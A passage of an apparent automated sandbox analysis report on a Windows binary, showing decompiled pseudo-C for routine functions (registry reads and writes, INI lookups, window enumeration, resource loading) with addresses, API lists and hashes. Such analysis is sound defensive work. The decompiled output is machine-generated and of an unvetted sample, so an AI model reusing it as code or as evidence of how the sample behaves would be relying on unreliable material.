						_t32 = 0;
						__eflags = 0;
					} else {
						_push(0x44eccc);
						_push(0x44f424);
						_push(0x44f10c);
						_push(0x81);
						_t32 = E004172AA(_t54, _t31, _t81, _t85, _t91, __eflags);
					}
					_t55 = _t54 | 0xffffffff;
					_push(_t32);
					 *(_t98 + 0x48) = _t55;
					E00416787(_t55, _t91, _t85, _t91, __eflags);
					_t34 = E00404461(__eflags, 0x248);
					_t97 = _t98 + 4;
					_v60 = _t34;
					_v8 = 1;
					__eflags = _t34;
					if(_t34 == 0) {
						_t86 = 0;
						__eflags = 0;
					} else {
						_t86 = E00401380();
					}
					_t35 =  *_t86;
					_t82 =  *((intOrPtr*)(_t35 + 0x140));
					_v8 = _t55;
					_t36 =  *((intOrPtr*)( *((intOrPtr*)(_t35 + 0x140))))(0x80, 0xcf8000, 0, 0); // executed
					__eflags = _t36;
					if(__eflags == 0) {
						goto L3;
					} else {
						 *((intOrPtr*)(_t91 + 0x20)) = _t86;
						E00416A7E(_t55, _t91, _t82, _t86, _t91, __eflags); // executed
						_push(1);
						E004165C6(); // executed
						E0041576C(_t97 + 0x14, __eflags);
						 *((intOrPtr*)(_t97 + 0x48)) = 2;
						E00414D4B(_t97 + 0x14);
						_push( &_v80);
						_t42 = E00416609(_t55, _t91, _t82, _t86, _t91, __eflags); // executed
						__eflags = _t42;
						if(_t42 != 0) {
							DragAcceptFiles( *( *((intOrPtr*)(_t91 + 0x20)) + 0x20), 1);
							E00412C34(_t86,  *((intOrPtr*)(_t91 + 0x4c)));
							UpdateWindow( *(_t86 + 0x20));
							_v36 = _t55;
							E004157B0( &_v84,  *( *((intOrPtr*)(_t91 + 0x20)) + 0x20));
							 *[fs:0x0] = _v44;
							return 1;
						} else {
							_v32 = _t55;
							E004157B0( &_v80, _t82);
							__eflags = 0;
							 *[fs:0x0] = _v40;
							return 0;
						}
					}
				} else {
					_t52 = GetVersion();
					_t103 = _t52 - 4;
					if(_t52 >= 4) {
						goto L4;
					} else {
						_push(0xffffffff);
						_push(0);
						_push(0x66);
						E00417146(_t54, _t81, GetVersion, _t91, _t103);
						L3:
						 *[fs:0x0] = _v32;
						return 0;
					}
				}
			}


































                  0x004016f0
                  0x004016f0
                  0x004016f2
                  0x004016fd
                  0x004016fe
                  0x00401701
                  0x00401704
                  0x0040170b
                  0x00401710
                  0x00401716
                  0x00401718
                  0x00401722
                  0x0040174a
                  0x0040174e
                  0x00401758
                  0x0040175d
                  0x00401760
                  0x00401764
                  0x0040176c
                  0x0040176e
                  0x0040178d
                  0x0040178d
                  0x00401770
                  0x00401770
                  0x00401775
                  0x0040177a
                  0x0040177f
                  0x00401786
                  0x00401786
                  0x0040178f
                  0x00401792
                  0x00401795
                  0x00401799
                  0x004017a3
                  0x004017a8
                  0x004017ab
                  0x004017af
                  0x004017b7
                  0x004017b9
                  0x004017c6
                  0x004017c6
                  0x004017bb
                  0x004017c2
                  0x004017c2
                  0x004017c8
                  0x004017ca
                  0x004017e0
                  0x004017e4
                  0x004017e6
                  0x004017e8
                  0x00000000
                  0x004017ee
                  0x004017f0
                  0x004017f3
                  0x004017f8
                  0x004017fc
                  0x00401805
                  0x00401811
                  0x00401819
                  0x00401822
                  0x00401825
                  0x0040182a
                  0x0040182c
                  0x00401859
                  0x00401865
                  0x0040186e
                  0x00401878
                  0x0040187c
                  0x0040188a
                  0x00401898
                  0x0040182e
                  0x00401832
                  0x00401836
                  0x0040183b
                  0x00401841
                  0x0040184f
                  0x0040184f
                  0x0040182c
                  0x00401724
                  0x00401724
                  0x00401726
                  0x00401728
                  0x00000000
                  0x0040172a
                  0x0040172a
                  0x0040172c
                  0x0040172e
                  0x00401730
                  0x00401735
                  0x0040173b
                  0x00401749
                  0x00401749
                  0x00401728

                  APIs
                  • GetVersion.KERNEL32(18EAB29F), ref: 0040171E
                  • GetVersion.KERNEL32 ref: 00401724
                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00401859
                  • UpdateWindow.USER32(?), ref: 0040186E
                    • Part of subcall function 00417146: __EH_prolog3.LIBCMT ref: 0041714D
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Version$AcceptDragFilesH_prolog3UpdateWindow
                  • String ID:
                  • API String ID: 1881653373-0
                  • Opcode ID: e1d20883db954ebd26c60d39e0b636da3169bcd13c438ce3e85def14de5a3047
                  • Instruction ID: a17e9845648d9b61e4f7684013c638e6b3f52b511be3bda972cb7d9a165d9d00
                  • Opcode Fuzzy Hash: e1d20883db954ebd26c60d39e0b636da3169bcd13c438ce3e85def14de5a3047
                  • Instruction Fuzzy Hash: 6641B1B13443009BD714EB25DD42BAAB7E5AB84B14F00093FFA46933D1EB79E805875A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426700, Relevance: 6.1, APIs: 4, Instructions: 112registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00426700(void* __ecx, intOrPtr _a4, CHAR* _a8, char* _a12, long _a16) {
				int* _v8;
				char _v16;
				signed int _v20;
				char _v4116;
				char _v4120;
				intOrPtr _v4124;
				CHAR* _v4128;
				int _v4132;
				long _v4136;
				void* _v4140;
				int _v4144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				signed int _t46;
				CHAR* _t48;
				intOrPtr _t52;
				void* _t54;
				long _t58;
				char* _t69;
				intOrPtr _t70;
				intOrPtr _t79;
				long _t85;
				intOrPtr _t87;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t92;
				signed int _t93;

				_t71 = __ecx;
				_push(0xffffffff);
				_push(E0044C291);
				_push( *[fs:0x0]);
				E004348C0(0x1020);
				_t45 =  *0x463404; // 0x18eab29f
				_t46 = _t45 ^ _t93;
				_v20 = _t46;
				_push(_t46);
				 *[fs:0x0] =  &_v16;
				_t87 = _a4;
				_t85 = _a16;
				_t48 = _a8;
				_t69 = _a12;
				_v4124 = _t87;
				_v4128 = _t85;
				_v4136 = 0;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					__eflags = _t85;
					if(__eflags == 0) {
						_v4128 = 0x44f0f5;
					}
					GetPrivateProfileStringA(_t48, _t69, _v4128,  &_v4116, 0x1000,  *(_t71 + 0x68)); // executed
					_push( &_v4116);
					goto L12;
				} else {
					_t54 = E0042652C(__ecx, _t48);
					_v4140 = _t54;
					_t95 = _t54;
					if(_t54 != 0) {
						E004014C0( &_v4120, _t85);
						_t89 = RegQueryValueExA;
						_v8 = 0;
						_v4144 = 0;
						_v4132 = 0;
						_t58 = RegQueryValueExA(_v4140, _t69, 0,  &_v4144, 0,  &_v4132);
						_v4136 = _t58;
						__eflags = _t58;
						if(_t58 == 0) {
							_v4136 = RegQueryValueExA(_v4140, _t69, 0,  &_v4144, E004014F0( &_v4120, _v4132),  &_v4132);
							E0040A356( &_v4120, 0xffffffff);
						}
						RegCloseKey(_v4140);
						_t79 = _v4124;
						__eflags = _v4136;
						if(__eflags != 0) {
							_push(_v4128);
							E00406039(_t69, _t79, _t85, _t89, 0, __eflags);
						} else {
							E00405562(_t79, __eflags,  &_v4120);
						}
						E004010B0(_v4120 + 0xfffffff0, _t85);
						_t52 = _v4124;
					} else {
						_push(_v4128);
						L12:
						E00406039(_t69, _t87, _t85, _t87, 0, _t95);
						_t52 = _t87;
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t88);
				_pop(_t92);
				_pop(_t70);
				return E00430650(_t52, _t70, _v20 ^ _t93, _t85, _t88, _t92);
			}

































                  0x00426700
                  0x00426705
                  0x00426707
                  0x00426712
                  0x00426718
                  0x0042671d
                  0x00426722
                  0x00426724
                  0x0042672a
                  0x0042672e
                  0x00426734
                  0x00426737
                  0x0042673a
                  0x0042673d
                  0x00426742
                  0x00426748
                  0x0042674e
                  0x00426757
                  0x00426841
                  0x00426843
                  0x00426845
                  0x00426845
                  0x00426866
                  0x00426872
                  0x00000000
                  0x0042675d
                  0x0042675e
                  0x00426763
                  0x00426769
                  0x0042676b
                  0x0042677e
                  0x00426783
                  0x004267a0
                  0x004267a3
                  0x004267a9
                  0x004267af
                  0x004267b1
                  0x004267b7
                  0x004267b9
                  0x004267ed
                  0x004267f3
                  0x004267f3
                  0x004267fe
                  0x00426804
                  0x0042680a
                  0x00426810
                  0x00426834
                  0x0042683a
                  0x00426812
                  0x00426819
                  0x00426819
                  0x00426827
                  0x0042682c
                  0x0042676d
                  0x0042676d
                  0x00426873
                  0x00426875
                  0x0042687a
                  0x0042687a
                  0x0042676b
                  0x0042687f
                  0x00426887
                  0x00426888
                  0x00426889
                  0x00426895

                  APIs
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,18EAB29F,?,?,?,?,0044C291,000000FF), ref: 004267AF
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,0044C291,000000FF), ref: 004267E3
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,0044C291,000000FF), ref: 004267FE
                  • GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 00426866
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: QueryValue$ClosePrivateProfileString
                  • String ID:
                  • API String ID: 1042844925-0
                  • Opcode ID: 44fdfa9ff4de0f88582ee937e59d4afd3fbe754f203e2044626775c54224bd21
                  • Instruction ID: d787f72a76d7a1e81abdc91ab3fdba828746559dca16c0f286bccc120076d8c8
                  • Opcode Fuzzy Hash: 44fdfa9ff4de0f88582ee937e59d4afd3fbe754f203e2044626775c54224bd21
                  • Instruction Fuzzy Hash: C2416A75D001A8ABDB31DF55DC449EEB7B8EB48354F0041EAF189A2290C7B89EC5DF68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040F918, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E0040F918(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E0040EE68(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20); // executed
							E0040F62D(_t22, _t24, _t25, __eflags); // executed
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E0040F918(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24); // executed
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}













                  0x0040f918
                  0x0040f918
                  0x0040f922
                  0x0040f928
                  0x0040f98b
                  0x0040f98b
                  0x0040f98f
                  0x00000000
                  0x00000000
                  0x0040f92c
                  0x0040f930
                  0x0040f95a
                  0x0040f932
                  0x0040f933
                  0x0040f938
                  0x0040f93a
                  0x0040f93c
                  0x0040f93f
                  0x0040f942
                  0x0040f945
                  0x0040f948
                  0x0040f949
                  0x0040f949
                  0x0040f93a
                  0x0040f960
                  0x0040f964
                  0x0040f967
                  0x0040f969
                  0x0040f96b
                  0x0040f97d
                  0x0040f97d
                  0x0040f96b
                  0x0040f985
                  0x0040f985
                  0x0040f994

                  APIs
                  • GetTopWindow.USER32(?), ref: 0040F928
                  • GetTopWindow.USER32(00000000), ref: 0040F967
                  • GetWindow.USER32(00000000,00000002), ref: 0040F985
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window
                  • String ID:
                  • API String ID: 2353593579-0
                  • Opcode ID: 7410f4b12793f2ec231ad1daf2c8ce28c1818b0d738aaaf39ca56126d1e55c8e
                  • Instruction ID: b27234d353631adc336677cf3729c0b56e1793a16e94a8337e953a23c5fb5991
                  • Opcode Fuzzy Hash: 7410f4b12793f2ec231ad1daf2c8ce28c1818b0d738aaaf39ca56126d1e55c8e
                  • Instruction Fuzzy Hash: 2F01D77600151ABBCF226F969C04F9F3A26BF49351F454436FA10615A0C73ACA26EFA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00427206, Relevance: 6.0, APIs: 4, Instructions: 48registrystringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 62%
                  			E00427206(void* __esi, void* _a4, CHAR* _a8, char* _a12) {
				void* __ebp;
				long _t13;
				long _t14;
				long _t17;
				long _t18;
				signed int _t20;
				void* _t23;
				void* _t24;
				void* _t25;
				long _t28;

				_t29 = _a12;
				if(_a12 != 0) {
					_push(__esi);
					_push( &_a4);
					_push(_a4);
					_push(0x80000000); // executed
					_t13 = E0041FF90(_t23, _t24, _t25, __esi, __eflags); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L6:
						_t14 = 0;
						__eflags = 0;
						L7:
						return _t14;
					}
					_t17 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1); // executed
					_t28 = _t17;
					_t18 = RegCloseKey(_a4);
					__eflags = _t18;
					if(_t18 != 0) {
						goto L6;
					}
					__eflags = _t28;
					if(_t28 != 0) {
						goto L6;
					}
					_t14 = _t18 + 1;
					goto L7;
				}
				_push(lstrlenA(_a8));
				_push(_a8);
				_push(1);
				_push(_a4);
				_push(0x80000000); // executed
				_t20 = E004200A3(_t23, _t24, _t25, __esi, _t29); // executed
				asm("sbb eax, eax");
				return  ~_t20 + 1;
			}













                  0x0042720b
                  0x0042720f
                  0x00427234
                  0x00427238
                  0x00427239
                  0x0042723c
                  0x00427241
                  0x00427246
                  0x00427248
                  0x0042727e
                  0x0042727e
                  0x0042727e
                  0x00427280
                  0x00000000
                  0x00427280
                  0x00427262
                  0x0042726b
                  0x0042726d
                  0x00427273
                  0x00427275
                  0x00000000
                  0x00000000
                  0x00427277
                  0x00427279
                  0x00000000
                  0x00000000
                  0x0042727b
                  0x00000000
                  0x0042727b
                  0x0042721a
                  0x0042721b
                  0x0042721e
                  0x00427220
                  0x00427223
                  0x00427228
                  0x0042722f
                  0x00000000

                  APIs
                  • lstrlenA.KERNEL32(?), ref: 00427214
                    • Part of subcall function 004200A3: __EH_prolog3.LIBCMT ref: 004200AA
                    • Part of subcall function 004200A3: RegSetValueA.ADVAPI32(80000000,?,00000000,?,?), ref: 00420114
                  • lstrlenA.KERNEL32(?,80000000,?,?), ref: 0042724D
                  • RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,?,00000001), ref: 00427262
                  • RegCloseKey.ADVAPI32(?), ref: 0042726D
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Valuelstrlen$CloseH_prolog3
                  • String ID:
                  • API String ID: 3141881944-0
                  • Opcode ID: ecfb811147b2c65053a74ac82368c8630f480c90e5ef6ef53a7cd7d30d4d7f0c
                  • Instruction ID: ccfb3bf29ba8f107e27247e9e6faae6128845c626efc22bed24505a1ddd35dde
                  • Opcode Fuzzy Hash: ecfb811147b2c65053a74ac82368c8630f480c90e5ef6ef53a7cd7d30d4d7f0c
                  • Instruction Fuzzy Hash: BE018F36604228FFEF111FA1EC04FEA3B69FB04754F508465FE19D9060D77589619BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00417E26, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E00417E26(intOrPtr __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				struct HINSTANCE__* _t23;

				_t18 = __edx;
				_push(__ecx);
				_push(_t22);
				_push(_t19);
				_v8 = __ecx;
				_t14 = 0;
				_t23 =  *(E0041F363(0, _t19, _t22, __eflags) + 0xc);
				_t20 = LoadResource(_t23, FindResourceA(_t23, _a4, 5));
				_t27 = _t20;
				if(_t20 != 0) {
					_t14 = LockResource(_t20);
				}
				_t9 = E00417A77(_t14, _v8, _t18, _t20, _t23, _t27, _t14, _a8, _t23); // executed
				FreeResource(_t20);
				return _t9;
			}















                  0x00417e26
                  0x00417e2b
                  0x00417e2d
                  0x00417e2e
                  0x00417e2f
                  0x00417e32
                  0x00417e39
                  0x00417e50
                  0x00417e52
                  0x00417e54
                  0x00417e5d
                  0x00417e5d
                  0x00417e67
                  0x00417e6f
                  0x00417e7b

                  APIs
                  • FindResourceA.KERNEL32(?,?,00000005), ref: 00417E42
                  • LoadResource.KERNEL32(?,00000000), ref: 00417E4A
                  • LockResource.KERNEL32(00000000), ref: 00417E57
                  • FreeResource.KERNEL32(00000000,00000000,?,?), ref: 00417E6F
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 8e08deefc1d4eeb41c3533c65acc15067e02b1b6d3acd629b27dc98bb15f0e42
                  • Instruction ID: 1e18d01870298c609716ab9c137838f91a6cabb118689048c7d05f5a7d7d13e7
                  • Opcode Fuzzy Hash: 8e08deefc1d4eeb41c3533c65acc15067e02b1b6d3acd629b27dc98bb15f0e42
                  • Instruction Fuzzy Hash: D1F0543B500214BBC7025FE79C48D9FBBBDEF86661B01406AFA0593251DA74DD0187A4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041EB0A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E0041EB0A(intOrPtr __ebx, void* __ecx, intOrPtr __edx) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v532;
				struct HINSTANCE__* _v536;
				intOrPtr _v544;
				WCHAR* _v556;
				intOrPtr _v560;
				char _v564;
				void* __edi;
				void* __esi;
				signed int _t25;
				intOrPtr _t36;
				intOrPtr _t40;
				struct HINSTANCE__* _t42;
				intOrPtr _t43;
				void* _t45;
				intOrPtr _t46;
				signed int _t50;

				_t40 = __edx;
				_t36 = __ebx;
				_t48 = _t50;
				_t25 =  *0x463404; // 0x18eab29f
				_v8 = _t25 ^ _t50;
				_t45 = __ecx;
				E0041EA0E(__ecx);
				_t42 =  *(__ecx + 8);
				_v10 = 0;
				_v12 = 0;
				if(GetModuleFileNameW(_t42,  &_v532, 0x105) != 0) {
					if(_v12 == 0) {
						_v556 =  &_v532;
						_push( &_v564);
						_v564 = 0x20;
						_v560 = 0x88;
						_v544 = 2;
						_v536 = _t42;
						_t30 = E0041EA7C(); // executed
						 *(_t45 + 0x80) = _t30;
						if(_t30 == 0xffffffff) {
							_push( &_v564);
							_v544 = 3;
							_t30 = E0041EA7C(); // executed
							 *(_t45 + 0x80) = _t30;
						}
						if( *(_t45 + 0x80) == 0xffffffff) {
							_push( &_v564);
							_v544 = 1;
							_t30 = E0041EA7C(); // executed
							 *(_t45 + 0x80) = _t30;
							if(_t30 == 0xffffffff) {
								 *(_t45 + 0x80) =  *(_t45 + 0x80) & 0x00000000;
							}
						}
					} else {
						SetLastError(0x6f);
					}
				}
				_pop(_t43);
				_pop(_t46);
				return E00430650(_t30, _t36, _v8 ^ _t48, _t40, _t43, _t46);
			}






















                  0x0041eb0a
                  0x0041eb0a
                  0x0041eb0d
                  0x0041eb15
                  0x0041eb1c
                  0x0041eb21
                  0x0041eb23
                  0x0041eb28
                  0x0041eb2d
                  0x0041eb31
                  0x0041eb4a
                  0x0041eb55
                  0x0041eb6a
                  0x0041eb76
                  0x0041eb77
                  0x0041eb81
                  0x0041eb8b
                  0x0041eb95
                  0x0041eb9b
                  0x0041eba0
                  0x0041eba9
                  0x0041ebb1
                  0x0041ebb2
                  0x0041ebbc
                  0x0041ebc1
                  0x0041ebc1
                  0x0041ebce
                  0x0041ebd6
                  0x0041ebd7
                  0x0041ebe1
                  0x0041ebe6
                  0x0041ebef
                  0x0041ebf1
                  0x0041ebf1
                  0x0041ebef
                  0x0041eb57
                  0x0041eb59
                  0x0041eb59
                  0x0041eb55
                  0x0041ebfb
                  0x0041ebfe
                  0x0041ec05

                  APIs
                    • Part of subcall function 0041EA0E: GetModuleHandleA.KERNEL32(KERNEL32,0041EB28), ref: 0041EA1C
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041EA3D
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0041EA4F
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(ActivateActCtx), ref: 0041EA61
                    • Part of subcall function 0041EA0E: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0041EA73
                  • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EB42
                  • SetLastError.KERNEL32(0000006F), ref: 0041EB59
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$Module$ErrorFileHandleLastName
                  • String ID:
                  • API String ID: 2524245154-3916222277
                  • Opcode ID: aeeff5c80dfc3c80a29db3524e515376337288fbe9707934b8743fd1988e9f38
                  • Instruction ID: 2d8284ff9693ed2a28cfc80b954e748d0848247ed859874abad0443c4c525062
                  • Opcode Fuzzy Hash: aeeff5c80dfc3c80a29db3524e515376337288fbe9707934b8743fd1988e9f38
                  • Instruction Fuzzy Hash: 252180749002289EDB20DF76C8487EEB7B4BF18324F10469ED469D3280DB789A85DF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00420AEC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E00420AEC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr _t33;

				_t27 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_push(4);
				E00431A9B(E0044BF03, __ebx, __edi, __esi);
				_t30 = __ecx;
				_t33 =  *((intOrPtr*)(_t31 + 8));
				_t34 = _t33 == 0;
				if(_t33 == 0) {
					L1:
					E00406436(_t22, _t23, _t27, _t30, _t34);
				}
				if( *_t30 == 0) {
					_t23 =  *0x466564; // 0x466568
					if(_t23 != 0) {
						L5:
						_t19 = E004206EA(_t23); // executed
						 *_t30 = _t19;
						if(_t19 == 0) {
							goto L1;
						}
					} else {
						 *((intOrPtr*)(_t31 - 0x10)) = 0x466568;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t21 = E00420802(0x466568);
						 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
						_t23 = _t21;
						 *0x466564 = _t21;
						if(_t21 == 0) {
							goto L1;
						} else {
							goto L5;
						}
					}
				}
				_t24 =  *0x466564; // 0x466568
				_t28 = E0042055C(_t24,  *_t30);
				_t39 = _t28;
				if(_t28 == 0) {
					_t17 =  *((intOrPtr*)(_t31 + 8))();
					_t25 =  *0x466564; // 0x466568
					E004208A9(_t22, _t25, _t17, _t30, _t39,  *_t30, _t17);
				}
				return E00431B73(_t28);
			}











                  0x00420aec
                  0x00420aec
                  0x00420aec
                  0x00420aec
                  0x00420af3
                  0x00420af8
                  0x00420afc
                  0x00420b02
                  0x00420b04
                  0x00420b06
                  0x00420b06
                  0x00420b06
                  0x00420b0e
                  0x00420b10
                  0x00420b18
                  0x00420b3b
                  0x00420b3b
                  0x00420b40
                  0x00420b44
                  0x00000000
                  0x00000000
                  0x00420b1a
                  0x00420b1f
                  0x00420b22
                  0x00420b26
                  0x00420b2b
                  0x00420b2f
                  0x00420b31
                  0x00420b39
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420b39
                  0x00420b18
                  0x00420b48
                  0x00420b53
                  0x00420b55
                  0x00420b57
                  0x00420b59
                  0x00420b5c
                  0x00420b67
                  0x00420b67
                  0x00420b73

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00420AF3
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Exception@8Throw
                  • String ID: heF$heF
                  • API String ID: 2489616738-1142830922
                  • Opcode ID: 1346ea712d4e4320666148ee57bc0ebccbde87501e25841d6042c4860ada4fcd
                  • Instruction ID: ab974ef05ecb18432cb7f708e95ae9439a66807c8b60da0ae834fd07ff38b2a5
                  • Opcode Fuzzy Hash: 1346ea712d4e4320666148ee57bc0ebccbde87501e25841d6042c4860ada4fcd
                  • Instruction Fuzzy Hash: 560152307002229BDB24EF75A86262A7AE29B40398F51403EE442C73A2EB78D841C75D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004200A3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E004200A3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t21;
				void* _t25;
				void* _t28;
				void* _t42;
				void* _t45;

				_t45 = __eflags;
				_t38 = __edx;
				_push(0);
				E00431A9B(E0044BE6F, __ebx, __edi, __esi);
				_push( *(_t42 + 0xc));
				E00406039(__ebx, _t42 + 0xc, __edx, __edi, __esi, _t45);
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				if( *(_t42 + 8) == 0x80000000) {
